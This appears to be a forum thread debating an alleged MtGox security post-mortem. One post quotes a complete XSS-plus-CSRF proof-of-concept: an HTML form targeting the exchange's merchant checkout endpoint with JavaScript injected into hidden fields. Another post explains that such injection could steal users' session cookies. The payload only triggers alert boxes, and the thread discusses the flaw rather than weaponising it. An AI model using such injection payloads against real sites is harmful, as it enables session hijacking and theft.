[Full Disclosure] More likely MtGox Post-Mortem

[Phil21]

#15 will not be responded to. This is common practice to prevent people who do not understand the issue at hand from making use of the exploit.

Since it appears Bit_Happy is a journalist, perhaps his question was in that frame of reference?  I'll give him the benefit of the doubt.

If that is the case, perhaps a private convo if you're willing would be appropriate, to demonstrate you actually do know what you're talking about and it's a legitimate problem.  This would assume Bit_Happy is writing an article on the topic?

Just wild assumptions, it's 1:30am

[1713513978]

1713513978

[Bit_Happy]

....
http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF)

IMO, Anyone starting a post like this needs to be able to demonstrate exactly where the attack part of this code is:

Code:

<body onload="/*document.forms['foo'].submit()*/"> <form id="foo" action="https://mtgox.com/merch/checkout" method="post" > <input type="hidden" name="notify_url" value="http://yourdomain.com/ipn.php&quot;})}alert(1);function blah(){test({5:&quot;"> <input type="hidden" name="business" value="foobar"> <input type="hidden" name="currency_code" value="USD"> <input type="hidden" name="item_name" value="Your Item Name<script>alert(1);</script>"> <input type="hidden" name="custom" value="your custom msg to yourself&quot;})}alert(1);function blah(){test({5:&quot;" > <input type="hidden" name="amount" value="10.30"> <input type="hidden" name="return" value="http://yourdomain.com/thanks"> <!--<input type="hidden" name="return" value="http://yourdomain.com/thanks&quot;;}alert(1);</script><script>">--> <input type="submit" value="Pay with Mt Gox" /> </form>

If you can show me (us) the "bad parts" and be correct, then thank you for posting this.
If you can't then (at best) you are acting without thinking things through.
Thank you

The above code has a simple html form and uses the MtGox merchant API.

Your thread title says [Full Disclosure] and you are failing to provide answers to simple questions. Welcome to the forum, but why should we trust you on an important issue?

+ Your excuse is total BS.
White-hat hackers share exploit code to learn how to defend themselves.
Please, either prove your accusations, or admit you should Not have made the accusative post.


Edit: Some (or all) may be true.
You offered [Full Disclosure], so let's have it.   

[gentakin]

Bit_Happy: That HTML code will show a form, that - when submitted - sends a request to the MtGox web server. Note that some of the parameters POSTed to MtGox contain Javascript code hidden in their value. MtGox had a security vulnerability that leads to printing out the javaascript (embedding into the HTML of MtGox) code posted to the site. As such, it is possible to execute Javascript code in the context of mtgox.com - and, for example, steal the user's cookie for MtGox.

This specific code did probably only show some message boxes to prove that (possibly malicious) javascript was executed.

[Bit_Happy]

#15 will not be responded to. This is common practice to prevent people who do not understand the issue at hand from making use of the exploit.

Since it appears Bit_Happy is a journalist, perhaps his question was in that frame of reference?  I'll give him the benefit of the doubt.

If that is the case, perhaps a private convo if you're willing would be appropriate, to demonstrate you actually do know what you're talking about and it's a legitimate problem.  This would assume Bit_Happy is writing an article on the topic?

Just wild assumptions, it's 1:30am

Hi Phil21,
My post #22 partially answers your comments

Also, let's take a close look at the thread title:

[Full Disclosure] == Not being provided
More likely MtGox Post-Mortem == Oh, that's a well thought out, fair, unbiased title if I ever saw one.  

[Bit_Happy]

Bit_Happy: That HTML code will show a form, that - when submitted - sends a request to the MtGox web server. Note that some of the parameters POSTed to MtGox contain Javascript code hidden in their value. MtGox had a security vulnerability that leads to printing out the javaascript (embedding into the HTML of MtGox) code posted to the site. As such, it is possible to execute Javascript code in the context of mtgox.com - and, for example, steal the user's cookie for MtGox.

This specific code did probably only show some message boxes to prove that (possibly malicious) javascript was executed.

Thanks gentakin, around here it's good to establish facts, instead of blindly believing a sensational headline.

[Savaron]

Bit_Happy: That HTML code will show a form, that - when submitted - sends a request to the MtGox web server. Note that some of the parameters POSTed to MtGox contain Javascript code hidden in their value. MtGox had a security vulnerability that leads to printing out the javaascript (embedding into the HTML of MtGox) code posted to the site. As such, it is possible to execute Javascript code in the context of mtgox.com - and, for example, steal the user's cookie for MtGox.

This specific code did probably only show some message boxes to prove that (possibly malicious) javascript was executed.

Thanks gentakin, around here it's good to establish facts, instead of blindly believing a sensational headline.

So just because you don't understand the code, it means everyone is blindly believing a sensational headline?

[Bit_Happy]

Bit_Happy: That HTML code will show a form, that - when submitted - sends a request to the MtGox web server. Note that some of the parameters POSTed to MtGox contain Javascript code hidden in their value. MtGox had a security vulnerability that leads to printing out the javaascript (embedding into the HTML of MtGox) code posted to the site. As such, it is possible to execute Javascript code in the context of mtgox.com - and, for example, steal the user's cookie for MtGox.

This specific code did probably only show some message boxes to prove that (possibly malicious) javascript was executed.

Thanks gentakin, around here it's good to establish facts, instead of blindly believing a sensational headline.

So just because you don't understand the code, it means everyone is blindly believing a sensational headline?

Hello Savaron,
Edit: No it means I don't blindly believe it.
Since you asked: I know a decent amount of php, but not hardly any Javascript.


...Plus, his title is BS, IMO.

[Bit_Happy]

...duplicate post..

[Jaime Frontero]

Magical Tux probably doesn't have 500k BTC.  Perhaps everyone on the site combined would add up to 500k BTC.  I think every bitcoin on the site got liquidated.  So he is backing it out.  The problem is whether the coins got transferred out before he caught the transaction.

just as an aside, this doesn't quite feel right.

there are 60 k accounts, and a trading volume that was at 3M USD/day at its peak.

i'd be shocked if there were only 8% of existing Bitcoin on deposit at MtGox.

carry on...

[jrmithdobbs]

Update: I was mistaken in the posted logs regarding gavin's involvement with mybitcoin.com.

My apologies.

I have been informed that gavin is not involved with this service. My confusion came from his constant promotion of it.

[Bind]

... Or its all fabricated to make TradeHill look more secure in the eyes of the members of this forum.

I do not endorse tradehill. If you read the entire log the person who made the tradehill comments asked that they be removed from the posted log. I refused. I am not a blatant hypocrite.

I do not have a tradehill account.

I do not endorse tradehill as an exchange.

I am not in any way affiliated with tradehill.

I think tradehill is bad for bitcoin because of their blatant disregard for us financial laws and dependence on third world outsourced devs working on closed source software that cannot be publically audited.

Now that that's out of the way, back to your regularly scheduled good times!

I never said you did any of those things.

I said the possibility exists just like the possibility exists that you were duped and used by the people you have blindly trusted in your not-so [Full Disclosure].

Additionally, you or your associates has a dog in this fight in some way by saying its a Post Mordem for the exchange doing 99% of the bitcoin trading.

This leads me to further believe you want MT Gox to fail.

Again, there is no proof one way or the other... Just supposition and conjecture, wrapped in a nice thick blanket of ulterior motives and hidden agenda.

[Bind]

-removed - duplicate-

[Phil21]

Hello Savaron,
Edit: No it means I don't blindly believe it.
Since you asked: I know a decent amount of php, but not hardly any Javascript.


...Plus, his title is BS, IMO.

I was going to actually PM you re: your question, but it's been answered publicly here.  I think you'll find more annoyance at your question for someone to interpret code for you, than you will find malfeasance here.  Security type nerds are an ornery bunch   While I am certainly no coder, I checked a few of those links and to me all looked like legit exploits that I've commonly seen in the wild targeting my customers (day job).  While I can't say they were actively exploited, the evidence gives me pretty much 99% confidence they were.  By the time you can Google for them, it's usually been weeks or months that they have been active.

What is surprising, is not that there are security vulnerabilities - every site has them, period.  It's the absolute basic "secure coding 101" type stuff that was missed, that is just mind blowing to people who can interpret the above code easily.  When you are making $30k/mo or more, I think it's a reasonable expectation to assume the most very basics are handled in a professional manner.  While I'd expect this for some fortune 500 company, I honestly did NOT expect it from a fledgling community of so-called technologists.  Especially one who had the balls in the first place to operate such an exchange!  I know if I operated mtgox, every waking moment would have been me worrying about security holes I've forgotten about.  These could have been found by any simple code scanner readily available on the market.

Other than there being no such thing as "full disclosure" (especially when a company is specifically NOT disclosing anything) I don't see how the thread title is BS at all.  This is absolutely the "more likely MtGox Post-Mortem".  It's at least *plausible* while MtGox's official explanation simply is not.

I expect more information to come to light soon as well, I have a feeling this train is just getting started from past experience.

[Bit_Happy]

First, please keep in mind we are in a forum with a lot of lies, distortions and BS going around.

...I think you'll find more annoyance at your question for someone to interpret code for you, than you will find malfeasance here.

Post #4 == Jesus Christ.....
Post #6 ==  I told you so...
^^^
No problem with those posts, but they do not really help verify the OP is legit.

Post #5 == Your (Phil21's) good advice that people read the info.

My first post* ==

Fact?
What are his two independent sources, and why can they be trusted?
Exactly how do the posted links prove anything, in plain, simple English so everyone can understand, please?
^^^

*If anyone finds that post to be an annoyance, then what can be done to help you be more tolerant?

Hello Savaron,
Edit: No it means I don't blindly believe it.
Since you asked: I know a decent amount of php, but not hardly any Javascript.


...Plus, his title is BS, IMO.

I was going to actually PM you re: your question, but it's been answered publicly here.  I think you'll find more annoyance at your question for someone to interpret code for you, than you will find malfeasance here.  Security type nerds are an ornery bunch  While I am certainly no coder, I checked a few of those links and to me all looked like legit exploits that I've commonly seen in the wild targeting my customers (day job).  While I can't say they were actively exploited, the evidence gives me pretty much 99% confidence they were.  By the time you can Google for them, it's usually been weeks or months that they have been active.

What is surprising, is not that there are security vulnerabilities - every site has them, period.  It's the absolute basic "secure coding 101" type stuff that was missed, that is just mind blowing to people who can interpret the above code easily.  When you are making $30k/mo or more, I think it's a reasonable expectation to assume the most very basics are handled in a professional manner.  While I'd expect this for some fortune 500 company, I honestly did NOT expect it from a fledgling community of so-called technologists.  Especially one who had the balls in the first place to operate such an exchange!  I know if I operated mtgox, every waking moment would have been me worrying about security holes I've forgotten about.  These could have been found by any simple code scanner readily available on the market.

Other than there being no such thing as "full disclosure" (especially when a company is specifically NOT disclosing anything) I don't see how the thread title is BS at all.  This is absolutely the "more likely MtGox Post-Mortem".  It's at least *plausible* while MtGox's official explanation simply is not.

I expect more information to come to light soon as well, I have a feeling this train is just getting started from past experience.

Your excellent post is detailed and informative Phil21.
If my annoyance helped motivate you to write it, I'm OK with that.  

[Phil21]

First, please keep in mind we are in a forum with a lot of lies, distortions and BS going around.

Indeed sir!

*If anyone finds that post to be an annoyance, then what can be done to help you be more tolerant?

I think the first one was likely annoyance due to the fact you (apparently, due to your question) did not read the chat log.  It was explained why identities were not verified.  Unfortunate to be sure, but you really only have MT to blame for this with his asinine attack on Kevin trying to associate him with the hacker.  I know I sure as hell wouldn't identify myself if I were discussing security vulnerabilites I've admitted to testing on MtGox any longer.  I first thought this of you as well, but then noticed your sig and decided it would be a good thing to extend the benefit of the doubt here (sorry, been a long day!).  Us nerd types (myself very much included) do get annoyed about having to answer questions we've already answered.  Aka your question was interpreted initially as laziness by myself, and perhaps some others - when it was actually more likely to be due diligence than anything else.

Your excellent post is detailed and informative Phil21.
If my annoyance helped motivate you to write it, I'm OK with that.  

Haha, I wasn't actually annoyed - my post wasn't very clear.  I actually am not a security hacker type (the folks you see discussing that in the logs), but I do happen to manage a small team of very talented folks who are.  Intelligence and computing knowledge really is the only thing generally respected by such folks (while on the Internet in "hacker" mode), and "noob" questions tend to overly annoy them when compared with the general population as a whole.  Lets just say it was a learning experience on how to best work with these types, but it's paid off in spades over time and I've met some truly exceptional individuals.

Yes, I'm generalizing.  But I think a lot of folks will agree with it!

Edit: formatting/few extra comments

[Phil21]

Also, full-disclosure is the name of a mailing list btw, hence the thread title

[piuk]

Herp derp, we do all our development in house.

[Bit_Happy]

...
Yes, I'm generalizing.  But I think a lot of folks will agree with it!...

Yes agreed, you might be surprised: I really respect when (honest) people challenge me, or suggest I might be mistaken. I have a huge pool of knowledge and experience; Many of the areas in my "huge pool" are shallow, not deep.

You have a great night/day Phil, and I'll probably enjoy talking with you again.  

[db8393]

 Bit_Happy, you might start by learning to audit websites yourself?

Maybe if you offer a 10Btc bounty you can find a nice security professional to help explain it all to you.


At this point I would say Hackers 4   Mtgox 0

I bet MagicTux wishes he could play this card

http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=205022

[Bit_Happy]

Bit_Happy, you might start by learning to audit websites yourself?

Maybe if you offer a 10Btc bounty you can find a nice security professional to help explain it all to you.

At this point I would say Hackers 4   Mtgox 0

I bet MagicTux wishes he could play this card

http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=205022

Hi db8393, you might start by learning the majority here is no longer hard-core geeks and programmers.
...and, please keep in mind we are in a forum with a lot of lies, distortions and BS going around.

Maybe you can offer a 10Btc bounty to someone who can explain why a thread with the title "...More likely MtGox Post-Mortem", should require me to "find a nice security professional to help explain it."  


Edit: I politely, yet very firmly, asked some simple questions. should it be so hard to get easy answers?